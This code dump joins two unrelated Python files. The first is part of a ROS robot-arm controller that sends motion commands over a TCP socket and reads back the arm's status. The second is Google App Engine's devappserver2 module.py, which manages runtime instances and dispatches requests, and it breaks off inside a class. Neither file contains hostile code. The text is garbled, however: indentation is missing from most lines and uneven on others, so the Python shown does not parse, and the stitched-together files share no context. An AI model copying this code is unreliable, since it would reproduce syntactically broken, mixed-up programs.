#Socket = client()
def point_data(x,y,z,pitch,roll,yaw): ## receive pose data sent from the strategy side
pos.x = x
pos.y = y
pos.z = z
pos.pitch = pitch
pos.roll = roll
pos.yaw = yaw
##----------Arm Mode-------------###
def Arm_Mode(action,grip,ra,setvel,setboth): ## receive arm-mode data sent from the strategy side
global arm_mode_flag
socket_cmd.action = action
socket_cmd.grip = grip
socket_cmd.ra = ra
socket_cmd.setvel = setvel
socket_cmd.setboth = setboth
arm_mode_flag = True
#Socket_command()
##-------Arm Speed Mode------------###
def Speed_Mode(speedmode): ## receive arm speed-mode data sent from the strategy side
socket_cmd.Speedmode = speedmode
def socket_talker(): ## create the server node
pub = rospy.Publisher('chatter', Int32MultiArray, queue_size=10)
rospy.init_node(NAME)
rate = rospy.Rate(10) # 10hz
print ("Ready to connect")
while not rospy.is_shutdown():
# hello_str = "hello world %s" % rospy.get_time()
state = Int32MultiArray()
state.data = [state_feedback.ArmState,state_feedback.SentFlag]
pub.publish(state)
rate.sleep()
##---------- socket packet transmission --------------##
##--------------- send arm commands over the socket -----------------
def Socket_command(s):
global arm_mode_flag,data
# if arm_mode_flag == True:
# arm_mode_flag = False
for case in switch(socket_cmd.action):
#-------PtP Mode--------
if case(Taskcmd.Action_Type.PtoP):
for case in switch(socket_cmd.setboth):
if case(Taskcmd.Ctrl_Mode.CTRL_POS):
data = TCP.SetPtoP(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_POS,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel)
break
if case(Taskcmd.Ctrl_Mode.CTRL_EULER):
data = TCP.SetPtoP(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_EULER,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel)
break
if case(Taskcmd.Ctrl_Mode.CTRL_BOTH):
data = TCP.SetPtoP(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_BOTH,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel)
break
break
#-------Line Mode--------
if case(Taskcmd.Action_Type.Line):
for case in switch(socket_cmd.setboth):
if case(Taskcmd.Ctrl_Mode.CTRL_POS):
data = TCP.SetLine(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_POS,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel)
break
if case(Taskcmd.Ctrl_Mode.CTRL_EULER):
data = TCP.SetLine(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_EULER,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel )
break
if case(Taskcmd.Ctrl_Mode.CTRL_BOTH):
data = TCP.SetLine(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_BOTH,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel )
break
break
        #------- set arm speed --------
if case(Taskcmd.Action_Type.SetVel):
data = TCP.SetVel(socket_cmd.grip, socket_cmd.setvel)
break
        #------- set arm delay time --------
if case(Taskcmd.Action_Type.Delay):
data = TCP.SetDelay(socket_cmd.grip,0)
break
        #------- set arm rapid & safe speed mode --------
if case(Taskcmd.Action_Type.Mode):
data = TCP.Set_SpeedMode(socket_cmd.grip,socket_cmd.Speedmode)
break
    socket_cmd.action = 6 ## reset to the initial mode state
print(data)
print("Socket:", s)
    #Socket.send(data.encode('utf-8')) # socket send; encode the str so Python transmits bytes
s.send(data)
##-----------socket client--------
def socket_client():
#global Socket
try:
Socket = client()
Socket.get_connect()
#Socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
#Socket.connect(('192.168.0.1', 8080))#iclab 5 & iclab hiwin
#s.connect(('192.168.1.102', 8080))#iclab computerx
print('Connection has been successful')
except socket.error as msg:
print(msg)
sys.exit(1)
#print('Connection has been successful')
print(Socket.get_recieve())
Socket_feedback(Socket)
# while 1:
# feedback_str = Socket.recv(1024)
    # #arm side reports the arm state
    # if str(feedback_str[2]) == '48':# F: arm is Ready and can accept the next motion command
    # state_feedback.ArmState = 0
    # if str(feedback_str[2]) == '49':# T: arm is busy and cannot execute the next motion command
    # state_feedback.ArmState = 1
    # if str(feedback_str[2]) == '54':# 6: strategy finished
    # state_feedback.ArmState = 6
    # print("shutdown")
    # #confirm the send flag
    # if str(feedback_str[4]) == '48':# returned 0, false
    # state_feedback.SentFlag = 0
    # if str(feedback_str[4]) == '49':# returned 1, true
    # state_feedback.SentFlag = 1
    # ##--------------- send arm commands over the socket: end -----------------
# if state_feedback.ArmState == Taskcmd.Arm_feedback_Type.shutdown:
# break
rospy.on_shutdown(myhook)
Socket.close()
def Socket_feedback(s):
    global arm_mode_flag  # assigned below, so it must be declared global
    Socket = s
    while 1:
        if arm_mode_flag == True:
            arm_mode_flag = False
Socket_command(Socket)
feedback_str = Socket.get_recieve()
        #arm side reports the arm state
        if str(feedback_str[2]) == '48':# F: arm is Ready and can accept the next motion command
            state_feedback.ArmState = 0
        if str(feedback_str[2]) == '49':# T: arm is busy and cannot execute the next motion command
            state_feedback.ArmState = 1
        if str(feedback_str[2]) == '54':# 6: strategy finished
            state_feedback.ArmState = 6
            print("shutdown")
        #confirm the send flag
        if str(feedback_str[4]) == '48':# returned 0, false
            state_feedback.SentFlag = 0
        if str(feedback_str[4]) == '49':# returned 1, true
            state_feedback.SentFlag = 1
        ##--------------- send arm commands over the socket: end -----------------
if state_feedback.ArmState == Taskcmd.Arm_feedback_Type.shutdown:
break
##-----------socket client end--------
##-------------socket 封包傳輸 end--------------##
def myhook():
print ("shutdown time!")
if __name__ == '__main__':
    socket_cmd.action = 6 ## reset to the initial mode state
    ## multithreading
    t = threading.Thread(target=socket_client)
    t.start() # start the worker thread
    #time.sleep(1)
try:
socket_talker()
except rospy.ROSInterruptException:
pass
t.join()
    ## multithreading end
|
module.py
|
#!/usr/bin/env python
#
# Copyright 2007 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
"""Manage the lifecycle of runtime processes and dispatch requests to them."""
import collections
import cStringIO
import functools
import httplib
import logging
import math
import os.path
import random
import re
import string
import threading
import time
import urllib
import urlparse
import wsgiref.headers
from google.appengine.api import api_base_pb
from google.appengine.api import apiproxy_stub_map
from google.appengine.api import appinfo
from google.appengine.api import request_info
from google.appengine.api.logservice import log_service_pb
from google.appengine.tools.devappserver2 import application_configuration
from google.appengine.tools.devappserver2 import blob_image
from google.appengine.tools.devappserver2 import blob_upload
from google.appengine.tools.devappserver2 import channel
from google.appengine.tools.devappserver2 import constants
from google.appengine.tools.devappserver2 import endpoints
from google.appengine.tools.devappserver2 import errors
from google.appengine.tools.devappserver2 import file_watcher
from google.appengine.tools.devappserver2 import gcs_application
from google.appengine.tools.devappserver2 import go_runtime
from google.appengine.tools.devappserver2 import http_runtime_constants
from google.appengine.tools.devappserver2 import instance
try:
from google.appengine.tools.devappserver2 import java_runtime
except ImportError:
java_runtime = None
from google.appengine.tools.devappserver2 import login
from google.appengine.tools.devappserver2 import php_runtime
from google.appengine.tools.devappserver2 import python_runtime
from google.appengine.tools.devappserver2 import request_rewriter
from google.appengine.tools.devappserver2 import runtime_config_pb2
from google.appengine.tools.devappserver2 import start_response_utils
from google.appengine.tools.devappserver2 import static_files_handler
from google.appengine.tools.devappserver2 import thread_executor
from google.appengine.tools.devappserver2 import url_handler
from google.appengine.tools.devappserver2 import util
from google.appengine.tools.devappserver2 import wsgi_handler
from google.appengine.tools.devappserver2 import wsgi_server
_LOWER_HEX_DIGITS = string.hexdigits.lower()
_UPPER_HEX_DIGITS = string.hexdigits.upper()
_REQUEST_ID_HASH_LENGTH = 8
_THREAD_POOL = thread_executor.ThreadExecutor()
_RESTART_INSTANCES_CONFIG_CHANGES = frozenset(
[application_configuration.NORMALIZED_LIBRARIES_CHANGED,
application_configuration.SKIP_FILES_CHANGED,
application_configuration.NOBUILD_FILES_CHANGED,
# The server must be restarted when the handlers change because files
# appearing in static content handlers make them unavailable to the
# runtime.
application_configuration.HANDLERS_CHANGED,
application_configuration.ENV_VARIABLES_CHANGED])
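# Requests whose paths match this pattern (internal channel, image, login and
# upload endpoints) are not written to the request log.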
_REQUEST_LOGGING_BLACKLIST_RE = re.compile(
r'^/_ah/(?:channel/(?:dev|jsapi)|img|login|upload)')
# Fake arguments for _handle_script_request for request types that don't use
# user-specified handlers.
_EMPTY_MATCH = re.match('', '')
_DUMMY_URLMAP = appinfo.URLMap(script='/')
_SHUTDOWN_TIMEOUT = 30
def _static_files_regex_from_handlers(handlers):
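  # Builds one regex that matches every static file path; e.g. an upload
  # pattern r'images/.*\.png' plus a static_dir 'css' yield (roughly)
  # r'^(images/.*\.png)|(css/.*)$'.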
patterns = []
for url_map in handlers:
handler_type = url_map.GetHandlerType()
if url_map.application_readable:
continue
if handler_type == appinfo.STATIC_FILES:
patterns.append(r'(%s)' % url_map.upload)
elif handler_type == appinfo.STATIC_DIR:
patterns.append('(%s%s%s)' % (url_map.static_dir.rstrip(os.path.sep),
re.escape(os.path.sep), r'.*'))
return r'^%s$' % '|'.join(patterns)
class InteractiveCommandError(errors.Error):
pass
class _ScriptHandler(url_handler.UserConfiguredURLHandler):
"""A URL handler that will cause the request to be dispatched to an instance.
This handler is special in that it does not have a working handle() method
since the Module's dispatch logic is used to select the appropriate Instance.
"""
def __init__(self, url_map):
"""Initializer for _ScriptHandler.
Args:
url_map: An appinfo.URLMap instance containing the configuration for this
handler.
"""
try:
url_pattern = re.compile('%s$' % url_map.url)
except re.error, e:
raise errors.InvalidAppConfigError(
'invalid url %r in script handler: %s' % (url_map.url, e))
super(_ScriptHandler, self).__init__(url_map, url_pattern)
self.url_map = url_map
def handle(self, match, environ, start_response):
"""This is a dummy method that should never be called."""
raise NotImplementedError()
class Module(object):
"""The abstract base for all instance pool implementations."""
_RUNTIME_INSTANCE_FACTORIES = {
'go': go_runtime.GoRuntimeInstanceFactory,
'php': php_runtime.PHPRuntimeInstanceFactory,
'python': python_runtime.PythonRuntimeInstanceFactory,
'python27': python_runtime.PythonRuntimeInstanceFactory,
}
if java_runtime:
_RUNTIME_INSTANCE_FACTORIES.update({
'java': java_runtime.JavaRuntimeInstanceFactory,
'java7': java_runtime.JavaRuntimeInstanceFactory,
})
def _create_instance_factory(self,
module_configuration):
"""Create an instance.InstanceFactory.
Args:
module_configuration: An application_configuration.ModuleConfiguration
instance storing the configuration data for a module.
Returns:
      An instance.InstanceFactory subclass that can be used to create instances
with the provided configuration.
Raises:
RuntimeError: if the configuration specifies an unknown runtime.
"""
# TODO: a bad runtime should be caught before we get here.
if module_configuration.runtime not in self._RUNTIME_INSTANCE_FACTORIES:
raise RuntimeError(
'Unknown runtime %r; supported runtimes are %s.' %
(module_configuration.runtime,
', '.join(
sorted(repr(k) for k in self._RUNTIME_INSTANCE_FACTORIES))))
instance_factory = self._RUNTIME_INSTANCE_FACTORIES[
module_configuration.runtime]
return instance_factory(
request_data=self._request_data,
runtime_config_getter=self._get_runtime_config,
module_configuration=module_configuration)
def _create_url_handlers(self):
"""Constructs URLHandlers based on the module configuration.
Returns:
      A list of url_handler.URLHandlers that can handle requests as described
      in the given configuration.
"""
handlers = []
# Add special URL handlers (taking precedence over user-defined handlers)
url_pattern = '/%s$' % login.LOGIN_URL_RELATIVE
handlers.append(wsgi_handler.WSGIHandler(login.application,
url_pattern))
url_pattern = '/%s' % blob_upload.UPLOAD_URL_PATH
# The blobstore upload handler forwards successful requests back to self
handlers.append(
wsgi_handler.WSGIHandler(blob_upload.Application(self), url_pattern))
url_pattern = '/%s' % blob_image.BLOBIMAGE_URL_PATTERN
handlers.append(
wsgi_handler.WSGIHandler(blob_image.Application(), url_pattern))
url_pattern = '/%s' % channel.CHANNEL_URL_PATTERN
handlers.append(
wsgi_handler.WSGIHandler(channel.application, url_pattern))
url_pattern = '/%s' % gcs_application.GCS_URL_PATTERN
handlers.append(
wsgi_handler.WSGIHandler(gcs_application.Application(), url_pattern))
url_pattern = '/%s' % endpoints.API_SERVING_PATTERN
handlers.append(
wsgi_handler.WSGIHandler(
endpoints.EndpointsDispatcher(self._dispatcher), url_pattern))
found_start_handler = False
found_warmup_handler = False
# Add user-defined URL handlers
for url_map in self._module_configuration.handlers:
handler_type = url_map.GetHandlerType()
if handler_type == appinfo.HANDLER_SCRIPT:
handlers.append(_ScriptHandler(url_map))
if not found_start_handler and re.match('%s$' % url_map.url,
'/_ah/start'):
found_start_handler = True
if not found_warmup_handler and re.match('%s$' % url_map.url,
'/_ah/warmup'):
found_warmup_handler = True
elif handler_type == appinfo.STATIC_FILES:
handlers.append(
static_files_handler.StaticFilesHandler(
self._module_configuration.application_root,
url_map))
elif handler_type == appinfo.STATIC_DIR:
handlers.append(
static_files_handler.StaticDirHandler(
self._module_configuration.application_root,
url_map))
else:
assert 0, 'unexpected handler %r for %r' % (handler_type, url_map)
# Add a handler for /_ah/start if no script handler matches.
if not found_start_handler:
handlers.insert(0, _ScriptHandler(self._instance_factory.START_URL_MAP))
# Add a handler for /_ah/warmup if no script handler matches and warmup is
# enabled.
if (not found_warmup_handler and
'warmup' in (self._module_configuration.inbound_services or [])):
handlers.insert(0, _ScriptHandler(self._instance_factory.WARMUP_URL_MAP))
return handlers
def _get_runtime_config(self):
"""Returns the configuration for the runtime.
Returns:
A runtime_config_pb2.Config instance representing the configuration to be
passed to an instance. NOTE: This does *not* include the instance_id
field, which must be populated elsewhere.
"""
runtime_config = runtime_config_pb2.Config()
runtime_config.app_id = self._module_configuration.application
runtime_config.version_id = self._module_configuration.version_id
if self._module_configuration.module_name:
runtime_config.version_id = '%s:%s' % (
self._module_configuration.module_name, runtime_config.version_id)
if self._threadsafe_override is None:
runtime_config.threadsafe = self._module_configuration.threadsafe or False
else:
runtime_config.threadsafe = self._threadsafe_override
runtime_config.application_root = (
self._module_configuration.application_root)
if not self._allow_skipped_files:
runtime_config.skip_files = str(self._module_configuration.skip_files)
runtime_config.static_files = _static_files_regex_from_handlers(
self._module_configuration.handlers)
runtime_config.api_host = self._api_host
runtime_config.api_port = self._api_port
runtime_config.stderr_log_level = self._runtime_stderr_loglevel
runtime_config.datacenter = 'us1'
runtime_config.auth_domain = self._auth_domain
if self._max_instances is not None:
runtime_config.max_instances = self._max_instances
for library in self._module_configuration.normalized_libraries:
runtime_config.libraries.add(name=library.name, version=library.version)
for key, value in (self._module_configuration.env_variables or {}).items():
runtime_config.environ.add(key=str(key), value=str(value))
if self._cloud_sql_config:
runtime_config.cloud_sql_config.CopyFrom(self._cloud_sql_config)
if self._php_config and self._module_configuration.runtime == 'php':
runtime_config.php_config.CopyFrom(self._php_config)
if (self._python_config and
self._module_configuration.runtime.startswith('python')):
runtime_config.python_config.CopyFrom(self._python_config)
return runtime_config
def _maybe_restart_instances(self, config_changed, file_changed):
"""Restarts instances. May avoid some restarts depending on policy.
One of config_changed or file_changed must be True.
Args:
config_changed: True if the configuration for the application has changed.
file_changed: True if any file relevant to the application has changed.
"""
if not config_changed and not file_changed:
return
logging.debug('Restarting instances.')
policy = self._instance_factory.FILE_CHANGE_INSTANCE_RESTART_POLICY
assert policy is not None, 'FILE_CHANGE_INSTANCE_RESTART_POLICY not set'
with self._condition:
instances_to_quit = set()
for inst in self._instances:
if (config_changed or
(policy == instance.ALWAYS) or
(policy == instance.AFTER_FIRST_REQUEST and inst.total_requests)):
instances_to_quit.add(inst)
self._instances -= instances_to_quit
for inst in instances_to_quit:
inst.quit(allow_async=True)
def _handle_changes(self):
"""Handle file or configuration changes."""
# Always check for config and file changes because checking also clears
# pending changes.
config_changes = self._module_configuration.check_for_updates()
has_file_changes = self._watcher.has_changes()
if application_configuration.HANDLERS_CHANGED in config_changes:
handlers = self._create_url_handlers()
with self._handler_lock:
self._handlers = handlers
if has_file_changes:
self._instance_factory.files_changed()
if config_changes & _RESTART_INSTANCES_CONFIG_CHANGES:
self._instance_factory.configuration_changed(config_changes)
self._maybe_restart_instances(
config_changed=bool(config_changes & _RESTART_INSTANCES_CONFIG_CHANGES),
file_changed=has_file_changes)
def __init__(self,
module_configuration,
host,
balanced_port,
api_host,
api_port,
auth_domain,
runtime_stderr_loglevel,
php_config,
python_config,
cloud_sql_config,
default_version_port,
port_registry,
request_data,
dispatcher,
max_instances,
use_mtime_file_watcher,
automatic_restarts,
allow_skipped_files,
threadsafe_override):
"""Initializer for Module.
Args:
module_configuration: An application_configuration.ModuleConfiguration
instance storing the configuration data for a module.
host: A string containing the host that any HTTP servers should bind to
e.g. "localhost".
balanced_port: An int specifying the port where the balanced module for
the pool should listen.
api_host: The host that APIModule listens for RPC requests on.
api_port: The port that APIModule listens for RPC requests on.
auth_domain: A string containing the auth domain to set in the environment
variables.
      runtime_stderr_loglevel: An int representing the minimum logging level at
which runtime log messages should be written to stderr. See
devappserver2.py for possible values.
      php_config: A runtime_config_pb2.PhpConfig instance containing PHP
runtime-specific configuration. If None then defaults are used.
python_config: A runtime_config_pb2.PythonConfig instance containing
Python runtime-specific configuration. If None then defaults are
used.
cloud_sql_config: A runtime_config_pb2.CloudSQL instance containing the
required configuration for local Google Cloud SQL development. If None
then Cloud SQL will not be available.
default_version_port: An int containing the port of the default version.
port_registry: A dispatcher.PortRegistry used to provide the Dispatcher
with a mapping of port to Module and Instance.
request_data: A wsgi_request_info.WSGIRequestInfo that will be provided
with request information for use by API stubs.
dispatcher: A Dispatcher instance that can be used to make HTTP requests.
max_instances: The maximum number of instances to create for this module.
If None then there is no limit on the number of created instances.
use_mtime_file_watcher: A bool containing whether to use mtime polling to
monitor file changes even if other options are available on the
current platform.
automatic_restarts: If True then instances will be restarted when a
          file or configuration change that affects them is detected.
allow_skipped_files: If True then all files in the application's directory
are readable, even if they appear in a static handler or "skip_files"
directive.
threadsafe_override: If not None, ignore the YAML file value of threadsafe
and use this value instead.
"""
self._module_configuration = module_configuration
self._name = module_configuration.module_name
self._host = host
self._api_host = api_host
self._api_port = api_port
self._auth_domain = auth_domain
self._runtime_stderr_loglevel = runtime_stderr_loglevel
self._balanced_port = balanced_port
self._php_config = php_config
self._python_config = python_config
self._cloud_sql_config = cloud_sql_config
self._request_data = request_data
self._allow_skipped_files = allow_skipped_files
self._threadsafe_override = threadsafe_override
self._dispatcher = dispatcher
self._max_instances = max_instances
self._automatic_restarts = automatic_restarts
self._use_mtime_file_watcher = use_mtime_file_watcher
self._default_version_port = default_version_port
self._port_registry = port_registry
self._instance_factory = self._create_instance_factory(
self._module_configuration)
if self._automatic_restarts:
self._watcher = file_watcher.get_file_watcher(
[self._module_configuration.application_root] +
self._instance_factory.get_restart_directories(),
self._use_mtime_file_watcher)
else:
self._watcher = None
self._handler_lock = threading.Lock()
self._handlers = self._create_url_handlers()
self._balanced_module = wsgi_server.WsgiServer(
(self._host, self._balanced_port), self)
self._quit_event = threading.Event() # Set when quit() has been called.
@property
def name(self):
"""The name of the module, as defined in app.yaml.
    This value will be constant for the lifetime of the module even if the
    module configuration changes.
"""
return self._name
@property
def ready(self):
"""The module is ready to handle HTTP requests."""
return self._balanced_module.ready
@property
def balanced_port(self):
"""The port that the balanced HTTP server for the Module is listening on."""
assert self._balanced_module.ready, 'balanced module not running'
return self._balanced_module.port
@property
def host(self):
"""The host that the HTTP server(s) for this Module is listening on."""
return self._host
@property
def balanced_address(self):
"""The address of the balanced HTTP server e.g. "localhost:8080"."""
if self.balanced_port != 80:
return '%s:%s' % (self.host, self.balanced_port)
else:
return self.host
@property
def max_instance_concurrent_requests(self):
"""The number of concurrent requests that each Instance can handle."""
return self._instance_factory.max_concurrent_requests
@property
def module_configuration(self):
"""The application_configuration.ModuleConfiguration for this module."""
return self._module_configuration
@property
def supports_interactive_commands(self):
"""True if the module can evaluate arbitrary code and return the result."""
return self._instance_factory.SUPPORTS_INTERACTIVE_REQUESTS
def _handle_script_request(self,
environ,
start_response,
url_map,
match,
inst=None):
"""Handles a HTTP request that has matched a script handler.
Args:
environ: An environ dict for the request as defined in PEP-333.
start_response: A function with semantics defined in PEP-333.
url_map: An appinfo.URLMap instance containing the configuration for the
handler that matched.
match: A re.MatchObject containing the result of the matched URL pattern.
inst: The Instance to send the request to. If None then an appropriate
Instance will be chosen.
Returns:
An iterable over strings containing the body of the HTTP response.
"""
raise NotImplementedError()
def _no_handler_for_request(self, environ, start_response, request_id):
"""Handle a HTTP request that does not match any user-defined handlers."""
self._insert_log_message('No handlers matched this URL.', 2, request_id)
start_response('404 Not Found', [('Content-Type', 'text/plain')])
return ['The url "%s" does not match any handlers.' % environ['PATH_INFO']]
def _error_response(self, environ, start_response, status):
start_response('%d %s' % (status, httplib.responses[status]), [])
return []
def _handle_request(self, environ, start_response, inst=None,
request_type=instance.NORMAL_REQUEST):
"""Handles a HTTP request.
Args:
environ: An environ dict for the request as defined in PEP-333.
start_response: A function with semantics defined in PEP-333.
inst: The Instance to send the request to. If None then an appropriate
Instance will be chosen. Setting inst is not meaningful if the
request does not match a "script" handler.
request_type: The type of the request. See instance.*_REQUEST module
constants.
Returns:
An iterable over strings containing the body of the HTTP response.
"""
if inst:
try:
environ['SERVER_PORT'] = str(self.get_instance_port(inst.instance_id))
except request_info.NotSupportedWithAutoScalingError:
environ['SERVER_PORT'] = str(self.balanced_port)
else:
environ['SERVER_PORT'] = str(self.balanced_port)
if 'HTTP_HOST' in environ:
environ['SERVER_NAME'] = environ['HTTP_HOST'].split(':', 1)[0]
environ['DEFAULT_VERSION_HOSTNAME'] = '%s:%s' % (
environ['SERVER_NAME'], self._default_version_port)
with self._request_data.request(
environ,
self._module_configuration) as request_id:
should_log_request = not _REQUEST_LOGGING_BLACKLIST_RE.match(
environ['PATH_INFO'])
environ['REQUEST_ID_HASH'] = self.generate_request_id_hash()
if should_log_request:
environ['REQUEST_LOG_ID'] = self.generate_request_log_id()
if 'HTTP_HOST' in environ:
hostname = environ['HTTP_HOST']
elif environ['SERVER_PORT'] == '80':
hostname = environ['SERVER_NAME']
else:
hostname = '%s:%s' % (environ['SERVER_NAME'], environ['SERVER_PORT'])
if environ.get('QUERY_STRING'):
resource = '%s?%s' % (urllib.quote(environ['PATH_INFO']),
environ['QUERY_STRING'])
else:
resource = urllib.quote(environ['PATH_INFO'])
email, _, _ = login.get_user_info(environ.get('HTTP_COOKIE', ''))
method = environ.get('REQUEST_METHOD', 'GET')
http_version = environ.get('SERVER_PROTOCOL', 'HTTP/1.0')
logservice = apiproxy_stub_map.apiproxy.GetStub('logservice')
logservice.start_request(
request_id=request_id,
user_request_id=environ['REQUEST_LOG_ID'],
ip=environ.get('REMOTE_ADDR', ''),
app_id=self._module_configuration.application,
version_id=self._module_configuration.version_id,
nickname=email.split('@', 1)[0],
user_agent=environ.get('HTTP_USER_AGENT', ''),
host=hostname,
method=method,
resource=resource,
http_version=http_version,
module=self._module_configuration.module_name)
def wrapped_start_response(status, response_headers, exc_info=None):
response_headers.append(('Server',
http_runtime_constants.SERVER_SOFTWARE))
if should_log_request:
headers = wsgiref.headers.Headers(response_headers)
status_code = int(status.split(' ', 1)[0])
content_length = int(headers.get('Content-Length', 0))
logservice.end_request(request_id, status_code, content_length)
logging.info('%(module_name)s: '
'"%(method)s %(resource)s %(http_version)s" '
'%(status)d %(content_length)s',
{'module_name': self.name,
'method': method,
'resource': resource,
'http_version': http_version,
'status': status_code,
'content_length': content_length or '-'})
return start_response(status, response_headers, exc_info)
if (environ['REQUEST_METHOD'] in ('GET', 'HEAD', 'TRACE') and
int(environ.get('CONTENT_LENGTH') or '0') != 0):
# CONTENT_LENGTH may be empty or absent.
wrapped_start_response('400 Bad Request', [])
return ['"%s" requests may not contain bodies.' %
environ['REQUEST_METHOD']]
with self._handler_lock:
handlers = self._handlers
try:
request_url = environ['PATH_INFO']
if request_type in (instance.BACKGROUND_REQUEST,
instance.INTERACTIVE_REQUEST,
instance.SHUTDOWN_REQUEST):
app = functools.partial(self._handle_script_request,
url_map=_DUMMY_URLMAP,
match=_EMPTY_MATCH,
request_id=request_id,
inst=inst,
request_type=request_type)
return request_rewriter.frontend_rewriter_middleware(app)(
environ, wrapped_start_response)
for handler in handlers:
match = handler.match(request_url)
if match:
auth_failure = handler.handle_authorization(environ,
wrapped_start_response)
if auth_failure is not None:
return auth_failure
if isinstance(handler, _ScriptHandler):
app = functools.partial(self._handle_script_request,
url_map=handler.url_map,
match=match,
request_id=request_id,
inst=inst,
request_type=request_type)
return request_rewriter.frontend_rewriter_middleware(app)(
environ, wrapped_start_response)
else:
return handler.handle(match, environ, wrapped_start_response)
return self._no_handler_for_request(environ, wrapped_start_response,
request_id)
except StandardError, e:
logging.exception('Request to %r failed', request_url)
wrapped_start_response('500 Internal Server Error', [], e)
return []
def _async_shutdown_instance(self, inst, port):
_THREAD_POOL.submit(self._shutdown_instance, inst, port)
def _shutdown_instance(self, inst, port):
force_shutdown_time = time.time() + _SHUTDOWN_TIMEOUT
try:
environ = self.build_request_environ(
'GET', '/_ah/stop', [], '', '0.1.0.3', port, fake_login=True)
self._handle_request(environ,
start_response_utils.null_start_response,
inst=inst,
request_type=instance.SHUTDOWN_REQUEST)
logging.debug('Sent shutdown request: %s', inst)
except:
logging.exception('Internal error while handling shutdown request.')
finally:
time_to_wait = force_shutdown_time - time.time()
self._quit_event.wait(time_to_wait)
inst.quit(force=True)
def _insert_log_message(self, message, level, request_id):
logs_group = log_service_pb.UserAppLogGroup()
log_line = logs_group.add_log_line()
log_line.set_timestamp_usec(int(time.time() * 1e6))
log_line.set_level(level)
log_line.set_message(message)
request = log_service_pb.FlushRequest()
request.set_logs(logs_group.Encode())
response = api_base_pb.VoidProto()
logservice = apiproxy_stub_map.apiproxy.GetStub('logservice')
logservice._Dynamic_Flush(request, response, request_id)
@staticmethod
def generate_request_log_id():
"""Generate a random REQUEST_LOG_ID.
Returns:
A string suitable for use as a REQUEST_LOG_ID. The returned string is
      variable length to emulate the production values, which encapsulate
the application id, version and some log state.
"""
return ''.join(random.choice(_LOWER_HEX_DIGITS)
for _ in range(random.randrange(30, 100)))
@staticmethod
def generate_request_id_hash():
"""Generate a random REQUEST_ID_HASH."""
return ''.join(random.choice(_UPPER_HEX_DIGITS)
for _ in range(_REQUEST_ID_HASH_LENGTH))
def set_num_instances(self, instances):
"""Sets the number of instances for this module to run.
Args:
instances: An int containing the number of instances to run.
"""
raise request_info.NotSupportedWithAutoScalingError()
def get_num_instances(self):
"""Returns the number of instances for this module to run."""
raise request_info.NotSupportedWithAutoScalingError()
def suspend(self):
"""Stops the module from serving requests."""
raise request_info.NotSupportedWithAutoScalingError()
def resume(self):
"""Restarts the module."""
raise request_info.NotSupportedWithAutoScalingError()
def get_instance_address(self, instance_id):
"""Returns the address of the HTTP server for an instance."""
return '%s:%s' % (self.host, self.get_instance_port(instance_id))
def get_instance_port(self, instance_id):
"""Returns the port of the HTTP server for an instance."""
raise request_info.NotSupportedWithAutoScalingError()
def get_instance(self, instance_id):
"""Returns the instance with the provided instance ID."""
raise request_info.NotSupportedWithAutoScalingError()
@property
def supports_individually_addressable_instances(self):
return False
def create_interactive_command_module(self):
"""Returns a InteractiveCommandModule that can be sent user commands."""
if self._instance_factory.SUPPORTS_INTERACTIVE_REQUESTS:
return InteractiveCommandModule(self._module_configuration,
self._host,
self._balanced_port,
self._api_host,
self._api_port,
self._auth_domain,
self._runtime_stderr_loglevel,
self._php_config,
self._python_config,
self._cloud_sql_config,
self._default_version_port,
self._port_registry,
self._request_data,
self._dispatcher,
self._use_mtime_file_watcher,
self._allow_skipped_files,
self._threadsafe_override)
else:
raise NotImplementedError('runtime does not support interactive commands')
def build_request_environ(self, method, relative_url, headers, body,
source_ip, port, fake_login=False):
if isinstance(body, unicode):
body = body.encode('ascii')
url = urlparse.urlsplit(relative_url)
if port != 80:
host = '%s:%s' % (self.host, port)
else:
host = self.host
environ = {constants.FAKE_IS_ADMIN_HEADER: '1',
'CONTENT_LENGTH': str(len(body)),
'PATH_INFO': url.path,
'QUERY_STRING': url.query,
'REQUEST_METHOD': method,
'REMOTE_ADDR': source_ip,
'SERVER_NAME': self.host,
'SERVER_PORT': str(port),
'SERVER_PROTOCOL': 'HTTP/1.1',
'wsgi.version': (1, 0),
'wsgi.url_scheme': 'http',
'wsgi.errors': cStringIO.StringIO(),
'wsgi.multithread': True,
'wsgi.multiprocess': True,
'wsgi.input': cStringIO.StringIO(body)}
if fake_login:
environ[constants.FAKE_LOGGED_IN_HEADER] = '1'
util.put_headers_in_environ(headers, environ)
environ['HTTP_HOST'] = host
return environ
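# Illustrative sketch (not part of the original source) of how
# build_request_environ is typically used; `module` and the argument values
# below are hypothetical, and headers are assumed to be (name, value) pairs
# accepted by util.put_headers_in_environ:
#   environ = module.build_request_environ(
#       'GET', '/status?verbose=1', [('X-Trace', 'abc')], '',
#       '127.0.0.1', 8080)
#   # environ['REQUEST_METHOD'] == 'GET'
#   # environ['PATH_INFO'] == '/status'; environ['QUERY_STRING'] == 'verbose=1'
#   # environ['HTTP_HOST'] == '<module host>:8080' (a port of 80 omits the
#   #   ':80' suffix); environ['CONTENT_LENGTH'] == '0' for the empty body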
class AutoScalingModule(Module):
"""A pool of instances that is autoscaled based on traffic."""
# The minimum number of seconds to wait, after quitting an idle instance,
# before quitting another idle instance.
